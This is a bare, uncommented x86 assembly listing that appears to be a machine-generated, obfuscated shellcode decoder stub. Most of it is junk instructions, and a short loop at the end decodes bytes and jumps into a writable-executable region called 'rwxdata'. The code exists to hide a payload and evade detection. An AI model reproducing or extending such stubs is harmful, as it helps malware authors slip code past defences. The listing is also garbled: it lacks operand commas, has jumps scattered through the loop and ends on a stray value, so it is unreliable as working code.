_start
dec eax
xor edx esi
test edi 0x7c92e4f4
inc edx
stc
sub edx esi
inc esi
aam 0xa
sub ecx 0x7c92e4f4
xor edx 0x7c92e4f4
inc ebx
or ecx 0x2
mov esi 0x22fb
das
add ebx ecx
aad 0xa
aad 0xa
cld
inc ebx
and eax 0x0
dec edx
dec ecx
test ecx 0x0
dec edi
inc edi
dec eax
inc edx
dec edx
cld
aad 0xa
cmp edi 0x0
xor eax eax
adc ecx edx
cmc
add esi rw-data
mov edx eax
dec ebx
add ebx 0xc681
aam 0xa
dec ebx
aad 0xa
clc
clc
cld
dec eax
dec edx
or edi ebx
aam 0xa
dec ebx
sub ecx 0xc681
mov ecx edi
add ecx edx
clc
sub edx ebx
sub eax ecx
dec ebx
xor ecx 0x2
mov edi 0xffbafe8a
cmp eax ecx
aam 0xa
aad 0xa
aad 0xa
inc edx
mov ecx 0x0
sub ecx eax
not edi
aam 0xa
cmp ecx eax
das
or ecx ebx
add ebx 0xd7f7
aad 0xa
or ecx edx
dec ecx
mov ebx ecx
mov edx edx
and ecx ebx
stc
cmc
aam 0xa
xor eax ebx
aam 0xa
test ebx ebx
and eax eax
cld
mov edx edx
aam 0xa
cmp eax 0x0
mov ecx 0x1815
xor eax 0x1
aad 0xa
clc
sub ebx ebx
cmc
cmp edx 0x1
xor ecx 0x1ecb
cmc
aad 0xa
aam 0xa
aam 0xa
and edx eax
mov eax 0xf181
and edx edx
aam 0xa
aam 0xa
test eax eax
xor edx edx
sub eax 0xf181
or edx 0xf181
das
or eax 0xf181
aad 0xa
daa
cmp ebx eax
add ebx 0xf181
or eax 0xf181
dec ebx
add edx 0xf181
cmp ebx ebx
stc
adc edx eax
das
cmp ebx 0x0
or ebx eax
xor eax eax
not al
nop
jmp rwxdata
sub al cl
jmp rwxdata
sub al cl
sub al cl
not al
not al
jmp rwxdata
nop
xor al 0x60
nop
sub al cl
jmp rwxdata
not al
stosb [ edi ]
loop rwxdata
lodsb [ esi ]
add al cl
ror al 0x75
clc
add al 0x41
add al 0x28
sub al cl
jmp rwxdata
0x8827
